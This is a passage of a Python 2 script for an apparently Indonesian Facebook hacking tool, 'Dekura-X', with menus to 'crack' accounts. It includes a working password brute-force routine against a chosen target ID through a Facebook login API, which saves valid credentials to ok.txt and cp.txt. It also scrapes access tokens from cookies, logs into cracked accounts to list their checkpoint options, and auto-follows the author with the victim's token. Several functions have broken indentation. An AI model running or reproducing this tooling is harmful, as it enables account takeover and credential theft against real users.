"Mozilla/5.0 (Series40; Nokia208/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series30Plus; Nokia225/20.10.11; Profile/Series30Plus Configuration/Series30Plus) Gecko/20100401 S40OviBrowser/3.8.1.2.0612", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.48", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia2700-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45"])
# ---- Module-level runtime state ------------------------------------------
# Date parts for the menu header.  `ha`, `op` and `ta` are defined earlier
# in the file (presumably day / month / year strings) -- TODO confirm.
my_date = date.today()
hr = calendar.day_name[my_date.weekday()]  # English weekday name, e.g. "Monday"
tanggal = ("%s-%s-%s-%s"%(hr, ha, op, ta))  # "Weekday-dd-mm-yyyy", shown in menu()
tgl = ("%s %s %s"%(ha, op, ta))
# Month number -> English month name lookup table.
bulan_ttl = {"01": "January", "02": "February", "03": "March", "04": "April", "05": "May", "06": "June", "07": "July", "08": "August", "09": "September", "10": "October", "11": "November", "12": "December"}
# Python 2 hack: force UTF-8 as the default str encoding for the whole run.
reload(sys)
sys.setdefaultencoding("utf-8")
# Shared mechanize browser used by the email/password login flow (rawancp).
br = mechanize.Browser()
br.set_handle_robots(False)  # ignore robots.txt
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)  # follow meta-refresh, max 1s
br.addheaders = [('User-Agent',"NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+")]
# ANSI-colored ASCII-art banner (login menus) and logo (sub-screens).
banner = ("""\033[1;37m
______\033[1;91m __ __ \033[1;37m __
/ ____/ \033[1;91m / // / \033[1;37m _____ / /__
/ / \033[1;91m/ // /_ \033[1;37m / ___/ / //_/
/ /___ \033[1;91m/__ __/\033[1;37m / /__ / ,< Au \033[1;36m• \033[1;32mDekura-X.\033[1;37m
\____/ \033[1;91m /_/ \033[1;37m \___/ /_/|_|\n
\033[1;33m•\033[1;91m•\033[1;37m New Tools Hack Facebook Random \033[1;33m•\033[1;91m•\033[1;37m
\033[1;33m•\033[1;91m•\033[1;37m Gunakan Akun Tumbal Untuk Login! \033[1;33m•\033[1;91m•\033[1;37m""")
logo = """\033[1;37m
______\033[1;91m __ __ \033[1;37m __
/ ____/ \033[1;91m / // / \033[1;37m _____ / /__
/ / \033[1;91m/ // /_ \033[1;37m / ___/ / //_/
/ /___ \033[1;91m/__ __/\033[1;37m / /__ / ,< Au \033[1;36m• \033[1;32mDekura-X.\033[1;37m
\____/ \033[1;91m /_/ \033[1;37m \___/ /_/|_|\n"""
host="https://mbasic.facebook.com"
# Country name (lower-cased) of the current public IP, or None when the
# lookup fails for any reason (offline, API change, rate limit).
ips=None
try:
    ipne=requests.get("https://api.ipify.org").text.strip()
    ips=requests.get("https://ipapi.com/ip_api.php?ip="+ipne,headers={"Referer":"https://ip-api.com/","Content-Type":"application/json; charset=utf-8","User-Agent":"NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+"}).json()["country_name"].lower()
except:
    ips=None
def clear():
    """Clear the terminal using the right command for the host OS.

    sys.platform is e.g. "linux"/"linux2", "win32", "darwin".  The previous
    version tested `" linux" in ...` (leading space: never matches) and then
    `"win" in ...`, which wrongly matched "darwin" and ran `cls` on macOS.
    """
    if sys.platform.lower().startswith("win"):
        os.system("cls")
    else:
        # Linux, macOS and everything else understand `clear`.
        os.system("clear")
### Menu Login ###
def login():
    # Top-level login menu: clears the screen, shows the banner and routes
    # the user's choice to the matching login helper.  Invalid input prints
    # an error and re-displays the menu (tail recursion).
    os.system('clear')
    print banner
    print("\033[0;96m"+50*"-")
    print ' \x1b[0;97m[\x1b[0;96m1\x1b[0;97m] Login With Email & Pass (\033[1;36mRawan CheckPoint\033[1;37m)'
    print ' \x1b[0;97m[\x1b[0;96m2\x1b[0;97m] Login With Token Facebook (\033[1;36mRecommended\033[1;37m)'
    print ' \x1b[0;97m[\x1b[0;96m3\x1b[0;97m] Login With Cookie Facebook (\033[1;36mRecommended\033[1;37m)'
    print ' \x1b[0;97m[\x1b[0;96m4\x1b[0;97m] Check Video Cara Ambil Token/Cookie fb '
    print ' \x1b[0;97m[\x1b[0;96m0\x1b[0;97m] Exite Programs'
    sek = raw_input('\n \x1b[0;97m[\x1b[0;96m•\x1b[0;97m] Choose : ')
    if sek=="":
        print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
    elif sek=="1":
        rawancp()      # email/password login (may trigger checkpoint)
    elif sek=="2":
        log_token()    # login with a raw access token
    elif sek=="3":
        cookie()       # login with a raw cookie string
    elif sek=="4":
        alltutor()     # tutorial videos for grabbing token/cookie
    elif sek=="0":
        exit()
    else:
        print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
### Login Email&Pass ###
def rawancp():
    # Email/password login via the shared mechanize browser.  If a saved
    # token file already exists, jump straight to the tools menu; otherwise
    # submit the m.facebook.com login form and, on success, trade the
    # credentials for an access token via the legacy REST API.
    try:
        toket = open('___dekura___sayang___ara___','r')  # token cache file
        menu()
    except (KeyError,IOError):
        os.system('clear')
        print logo
        print("\033[0;96m"+50*"-")
        id = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Email/No: ')
        pwd = getpass.getpass("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Akun: ")
        jalan("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Sedang Login...")
        try:
            br.open('https://m.facebook.com')
        except mechanize.URLError:
            print"\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No connection"
            os.sys.exit()
        br._factory.is_html = True
        br.select_form(nr=0)  # first form on the page is the login form
        br.form['email'] = id
        br.form['pass'] = pwd
        br.submit()
        url = br.geturl()
        if 'save-device' in url:
            # A redirect to the "save device" page means login succeeded.
            try:
                # sig = md5 of the sorted, concatenated params + app secret
                # (legacy auth.login signing scheme).
                sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
                data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
                x=hashlib.new("md5")
                x.update(sig)
                a=x.hexdigest()
                data.update({'sig':a})
                url = "https://api.facebook.com/restserver.php"
                r=requests.get(url,params=data)
                z=json.loads(r.text)
                # Persist the access token for the rest of the tool.
                zedd = open("___dekura___sayang___ara___", 'w')
                zedd.write(z['access_token'])
                zedd.close()
                print '\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Berhasil Login'
                # Auto-follow the author's account with the fresh token.
                requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
                exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
            except requests.exceptions.ConnectionError:
                print"\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No connection"
                os.sys.exit()
        if 'checkpoint' in url:
            # Redirect to the checkpoint page: account is locked for review.
            print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Akun Anda Terkena Checkpoint")
            os.system('rm -rf ___dekura___sayang___ara___')
            os.sys.exit()
        else:
            # Anything else: wrong credentials -- clean up and retry.
            print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Login Gagal")
            os.system('rm -rf ___dekura___sayang___ara___')
            time.sleep(2)
            login()
### Login Token ###
def log_token():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
data = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token: ")
try:
me = requests.get('https://graph.facebook.com/me?access_token='+data)
open("___dekura___sayang___ara___",'w').write(data)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Login Success").format(G,N)
jalan("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Please Subscribe My Channel:)")
os.system('xdg-open https://youtube.com/c/orbXDBdbsS')
exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
except KeyError:
print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Invalid Token").format(R,N)
time.sleep(1.0)
raw_input("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Lihat Cara Ambil Token Y/y? ")
kontolrecode()
login()
### Login cookie ###
def cookie():
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
cookie = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Cookie: ")
try:
data = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers = {
'user-agent' : 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36', # Jangan Di Ganti Ea Anjink.
'referer' : 'https://m.facebook.com/',
'host' : 'm.facebook.com',
'origin' : 'https://m.facebook.com',
'upgrade-insecure-requests' : '1',
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
'cache-control' : 'max-age=0',
'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'content-type' : 'text/html; charset=utf-8'
}, cookies = {
'cookie' : cookie
})
find_token = re.search('(EAAA\w+)', data.text)
hasil = " \033[0;97m[\033[0;91m!\033[0;97m] Your Cookie Invalid" if (find_token is None) else '\n* Your fb access token : ' + find_token.group(1)
#print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Cookie Invalid")
#time.sleep(1.5)
#tutorcowlies()
except requests.exceptions.ConnectionError:
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] No Connection")
cookie = open("___dekura___sayang___ara___", 'w')
cookie.write(find_token.group(1))
cookie.close()
jalan("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Please Subscribe My Channel:)")
os.system('xdg-open https://youtube.com/c/orbXDBdbsS')
exit(nande.________________nande________________anatawa________________recode________________script________________watashi________________())
def convert():
    # Refresh the cached access token: read the cookie saved in ".cok",
    # scrape the mbasic composer page for an "EAAA..." token and, when one
    # is found, overwrite the token cache file.  Any failure is reported and
    # aborts the program.
    global post,reac,kom
    headers = {
        'user-agent' : 'Mozilla/5.0 (Linux; Android 10; GM1917) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.82 Mobile Safari/537.36',
        'referer' : 'https://m.facebook.com/',
        'host' : 'm.facebook.com',
        'origin' : 'https://m.facebook.com',
        'upgrade-insecure-requests' : '1',
        'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
        'cache-control' : 'max-age=0',
        'accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'content-type' : 'text/html; charset=utf-8'
    }
    try:
        kuki = open(".cok",'r').read()
        resp = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_',
                            headers=headers, cookies={'cookie': kuki})
        match = re.search('(EAAA\w+)', resp.text)
        if match is not None:
            open("___dekura___sayang___ara___",'w').write(match.group(1))
        return
    except Exception as e:
        print(R+"\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Error : %s"%e)
        exit()
### AMBIL TOKEN ###
def kontolrecode():
    # Open the "how to grab a Facebook token" YouTube tutorial, wait for the
    # user to press enter, then return to the login menu.
    os.system("clear")
    print(logo)
    print("\033[0;96m" + "-" * 50)
    jalan("{0} [{1}•{0}] Open Youtube...".format(p, o))
    os.system("xdg-open https://youtu.be/qhxw5BVUBlE")
    raw_input("{0} [BACK]".format(p))
    login()
### Ambil Cookies ###
def tutorcowlies():
    # Open the "how to grab a Facebook cookie" YouTube tutorial, wait for
    # the user to press enter, then return to the login menu.
    os.system("clear")
    print(logo)
    print("\033[0;96m" + "-" * 50)
    jalan("{0} [{1}•{0}] Open Youtube...".format(p, o))
    os.system("xdg-open https://youtu.be/NxkjhemO-r0")
    raw_input("{0} [BACK]".format(p))
    login()
### Tutor Ambil Cookie/Token ###
def alltutor():
os.system('clear')
print banner
print("\033[0;96m"+50*"-")
print ' \x1b[0;97m[\x1b[0;96m1\x1b[0;97m] Check Tutor Cara Ambil Token Facebook '
print ' \x1b[0;97m[\x1b[0;96m2\x1b[0;97m] Check Tutor Cara Ambil Cookie Facebook '
print ' \x1b[0;97m[\x1b[0;96m3\x1b[0;97m] Back To Menu Login'
print ' \x1b[0;97m[\x1b[0;96m0\x1b[0;97m] Exite Programs'
sek = raw_input('\n \x1b[0;97m[\x1b[0;96m•\x1b[0;97m] Choose : ')
if sek=="":
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);login()
elif sek=="1":
kontolrecode()
elif sek=="2":
tutorcowlies()
elif sek=="3":
login()
elif sek=="0":
exit()
else:
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah").format(R,N);alltutor()
### Menu Tools ###
def menu():
    # Main tools menu.  Needs a valid saved token; if reading/validating it
    # fails for any reason the user is bounced back to the login menu.
    try:
        toket = open('___dekura___sayang___ara___','r').read()
        otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
        a = json.loads(otw.text)
        nama = a['first_name']
        id = a['id']
    except Exception as e:
        print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Error : %s"%e).format(R,N)
        time.sleep(1)
        login()
    os.system("clear")
    print logo
    print("\033[0;96m"+50*"-")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Your Name : \033[1;32m"+nama)
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Your ID : \033[1;32m"+id)
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Tgl Login Sc : \033[1;32m"+tanggal)
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Version : \033[1;32mElite 1.0")
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Expired : \033[1;32m-")
    print("\033[0;96m"+50*"-")
    print("\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Crack ID From Friendlist/Public")
    print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Crack ID From Followers")
    print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Crack ID From Likes")
    print("\033[0;96m\033[0;97m [\033[1;36m4\033[1;37m] Crack From ID Target (\033[1;36mTergantung Hoki Kalian\033[1;37m)")
    print("\033[0;96m\033[0;97m [\033[1;36m5\033[1;37m] Crack With Email ")
    print("\033[0;96m\033[0;97m [\033[1;36m6\033[1;37m] Crack With Number Phone")
    print("\033[0;96m\033[0;97m [\033[1;36m7\033[1;37m] Cek Result Crack")
    print("\033[0;96m\033[0;97m [\033[1;36m8\033[1;37m] Cek Opsi Sesi Account Cp ")
    print("\033[0;96m\033[0;97m [\033[1;36m9\033[1;37m] Setting Ua %s(%s User agent%s ) "%(p,o,p))
    print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Logout")
    print ""
    r=raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
    if r=="":print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] isi Yang Benar").format(R,N);menu()
    elif r=="1":
        # collect target IDs, then run the cracker
        publik()
        dekura_x()
    elif r=="2":
        followers()
        dekura_x()
    elif r=="3":
        likes()
        dekura_x()
    elif r=="4":
        hek_target()
    elif r=="5":
        exit(emailerendem.emaileclone())# run from a separate module so it doesn't get stuck
    elif r=="6":
        exit(arawangy.tetearakecil())# run from a separate module so it doesn't get stuck
    elif r=="7":
        ress()
    elif r=="8":
        syngara()
    elif r=="9":
        setua()
    elif r=="0":
        # Logout: delete the saved token file.
        try:
            #os.remove(".cok")
            os.remove("___dekura___sayang___ara___")
            #exit(basecookie())
        except Exception as e:print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Eror file tidak ditemukan %s"%e)
    else:
        print ("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] SALAH ANJING!").format(R,N);menu()
### Set Ua (User agent) ###
def setua():
    # User-agent settings menu: set a custom UA, show the current one, or
    # pick a random one from the module-level pool.  The active UA lives in
    # ua.txt.
    #
    # Fix: the invalid-choice branch printed a message and then fell off the
    # end of the function, silently dropping the user out of the menu loop;
    # it now re-shows this menu.
    print("\n\033[0;96m\033[0;97m [\033[1;36m1\033[1;37m] Set User agent sendiri")
    print("\033[0;96m\033[0;97m [\033[1;36m2\033[1;37m] Cek User agent sekarang")
    print("\033[0;96m\033[0;97m [\033[1;36m3\033[1;37m] Set User agent random")
    print("\033[0;96m\033[0;97m [\033[1;36m0\033[1;37m] Back")
    print("")
    pil_ua=raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
    if pil_ua == "1" or pil_ua == "01":
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan User agent dengan benar agar tidak eror!")
        user=raw_input("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan Ua: ")
        open("ua.txt", "w").write(user)  # persist; read back by the crackers
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Sedang mengganti User agent!")
        time.sleep(1.5)
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Succes mengganti User agent!")
        raw_input("\033[1;37m [BACK]")
        menu()
    elif pil_ua == "2" or pil_ua == "02":
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent sekarang:%s %s %s "%(h,open('ua.txt').read(),p))
        raw_input("\033[1;37m [BACK]")
        menu()
    elif pil_ua == "3" or pil_ua == "03":
        # random UA taken from the module-level pool defined near the top
        randomuaa = ahahahaha_kimochii_araaaaaa
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent sekarang:%s %s %s "%(h,open('ua.txt').read(),p))
        time.sleep(1.5)
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Mohon tunggu sebentar...")
        time.sleep(1.5)
        open("ua.txt", "w").write(randomuaa)
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Succes mengganti User agent!")
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] User agent:%s %s %s "%(h,open('ua.txt').read(),p))
        raw_input("\033[1;37m [BACK]")
        menu()
    elif pil_ua == "0" or pil_ua == "00":
        menu()
    else:
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Pilihan Tidak Ada!")
        setua()
### Check Option Sesi ###
def syngara():
    # For every "user|pass" line in a cracked-accounts file (cp.txt format),
    # log in via aracans() and report the account's checkpoint options.
    print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Masukan File cp.txt")
    files = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] File: ")
    if files == "":
        menu()
    try:
        buka_baju = open(files, "r").readlines()
    except IOError:
        exit("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Files %s%s%s Tidak Ada!"%(h,files,p))
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Account Cp : \033[1;32m%s\033[1;37m"%(len(buka_baju)))
    print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Check Opsi Checkpoint, Please Wait...")
    for memek in buka_baju:
        # each line looks like "user|pass" (possibly decorated with " + ")
        kontol = memek.replace("\n","")
        titid = kontol.split("|")
        print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Account : "+(kontol.replace(" + ","")))
        try:
            aracans(titid[0].replace(" + ",""), titid[1])
        except requests.exceptions.ConnectionError:
            # best effort: skip this account and keep going
            pass
    print("\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Cek Account Checkpoint Selesai...")
    raw_input("%s [BACK]"%(p))
    menu()
def aracans(user, pasw):
    # Log in to mbasic.facebook.com with user/pasw and print the session
    # outcome: on success, list apps/accounts linked to the profile; on
    # checkpoint, list the verification options offered; otherwise print the
    # login error.
    #
    # Fixes over the original: the dataD literal carried duplicate
    # "fb_dtsg" and "jazoest" keys (later entries silently win in Python);
    # the hidden-field whitelist was named `list`, shadowing the builtin;
    # a no-op `else: continue` was dropped.
    mb = ("https://mbasic.facebook.com")
    ua = ("Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]")
    ses = requests.Session()
    ses.headers.update({"Host": "mbasic.facebook.com","cache-control": "max-age=0","upgrade-insecure-requests": "1","origin": mb,"content-type": "application/x-www-form-urlencoded","user-agent": ua,"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with": "mark.via.gp","sec-fetch-site": "same-origin","sec-fetch-mode": "navigate","sec-fetch-user": "?1","sec-fetch-dest": "document","referer": mb+"/login/?next&ref=dbl&fl&refid=8","accept-encoding": "gzip, deflate","accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
    data = {}
    # Scrape the login form and forward its hidden anti-CSRF fields.
    ged = parser(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
    fm = ged.find("form",{"method":"post"})
    wanted = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
    for i in fm.find_all("input"):
        if i.get("name") in wanted:
            data.update({i.get("name"):i.get("value")})
    data.update({"email":user,"pass":pasw})
    run = parser(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
    if "c_user" in ses.cookies:
        # Full login: list apps/accounts linked to this profile.
        kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
        run = parser(ses.get("https://free.facebook.com/settings/apps/tabbed/", cookies={"cookie":kuki}).text, "html.parser")
        xe = [re.findall("\<span.*?href=\".*?\">(.*?)<\/a><\/span>.*?\<div class=\".*?\">(.*?)<\/div>", str(td)) for td in run.find_all("td", {"aria-hidden":"false"})][2:]
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Akun Yang Mungkin Terkait Dengan Facebook : %s"%(str(len(xe))))
        num = 0
        for _ in xe:
            num += 1
            print(" "+str(num)+" "+_[0][0]+", "+_[0][1])
    elif "checkpoint" in ses.cookies:
        # Checkpointed: submit "Continue" and list the verification options.
        form = run.find("form")
        dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
        jzst = form.find("input",{"name":"jazoest"})["value"]
        nh = form.find("input",{"name":"nh"})["value"]
        dataD = {"fb_dtsg": dtsg,"jazoest": jzst,"checkpoint_data":"","submit[Continue]":"Lanjutkan","nh": nh}
        xnxx = parser(ses.post(mb+form["action"], data=dataD).text, "html.parser")
        ngew = [yy.text for yy in xnxx.find_all("option")]
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Total Opsi Yang Tersedia "+str(len(ngew)))
        for opt in range(len(ngew)):
            print(" [\033[1;36m"+str(opt+1)+"\033[1;37m] "+ngew[opt])
    elif "login_error" in str(run):
        oh = run.find("div",{"id":"login_error"}).find("div").text
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] %s"%(oh))
    else:
        print("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Login Gagal, ID/Pass Salah\n")
### BruteForce Target (Kalo Hoki) ###
def hek_target():
    # Dictionary attack on a single target ID via the b-api auth.login
    # endpoint.  A working password is written to ok.txt; a correct password
    # on a checkpointed account goes to cp.txt.
    global toket
    try:
        toket=open('___dekura___sayang___ara___','r').read()
    except IOError:
        print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token/Cookie Invalid"
        os.system('rm -rf ___dekura___sayang___ara___')
        login()
    os.system('clear')
    print logo
    print("\033[0;96m"+50*"-")
    try:
        email = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET: ")
        passw = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Wordlist: ")
        total = open(passw,"r")
        total = total.readlines()  # only used to report the password count
        time.sleep(1)
        print("\033[0;96m"+50*"-")
        time.sleep(1)
        print "\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET : "+email
        time.sleep(1)
        print "\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total Password : "+str(len(total))
        time.sleep(1)
        jalan('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Crack Started...')
        sandi = open(passw,"r")  # re-open so iteration starts from the top
        for pw in sandi:
            try:
                pw = pw.replace("\n","")
                # progress indicator: \r rewrites the same terminal line
                sys.stdout.write("\r\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Check Pass Valid : "+pw)
                sys.stdout.flush()
                data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
                mpsh = json.loads(data.text)
                if 'access_token' in mpsh:
                    # password accepted -> save and stop
                    dapat = open("ok.txt", "w")
                    dapat.write(email+"|"+pw+"\n")
                    dapat.close()
                    time.sleep(1.5)
                    print "\n [\033[1;36m\xe2\x80\xa2\x1b[1;37m] ACCOUNT SUCCES [\033[1;36m\xe2\x80\xa2\x1b[1;37m]"
                    time.sleep(2)
                    print("\033[0;96m"+50*"-")
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID : "+email)
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Valid : "+pw)
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] HASIL CRACK TERSIMPAN DI : ok.txt")
                    raw_input(" [BACK]")
                    menu()
                elif 'www.facebook.com' in mpsh["error_msg"]:
                    # correct password, but the account is checkpointed
                    ceks = open("cp.txt", "w")
                    ceks.write(email+"|"+pw+"\n")
                    ceks.close()
                    time.sleep(1.5)
                    print "\n [\033[1;36m\xe2\x80\xa2\x1b[1;37m] ACCOUNT CHECKPOINT [\033[1;36m\xe2\x80\xa2\x1b[1;37m]"
                    time.sleep(2)
                    print("\033[0;96m"+50*"-")
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID : "+email)
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Valid : "+pw)
                    print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] HASIL CRACK TERSIMPAN DI : cp.txt")
                    raw_input(" [BACK]")
                    menu()
            except requests.exceptions.ConnectionError:
                # transient network failure: keep trying the next password
                print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Connection Error"
                time.sleep(1)
    except IOError:
        print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] File Wordlist Tidak Di Temukan")
        time.sleep(2)
        menu()
################ LAGI DI UPDATE! ################
def wordlist(): # NOTE: still under development
    # Build a tiny password candidate file (pass.txt) from the target's
    # first name, fetched from the Graph API with the saved token.
    try:
        toket=open('___dekura___sayang___ara___','r').read()
    except IOError:
        print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token/Cookie Invalid"
        os.system('rm -rf ___dekura___sayang___ara___')
        login()
    os.system('clear')
    print logo
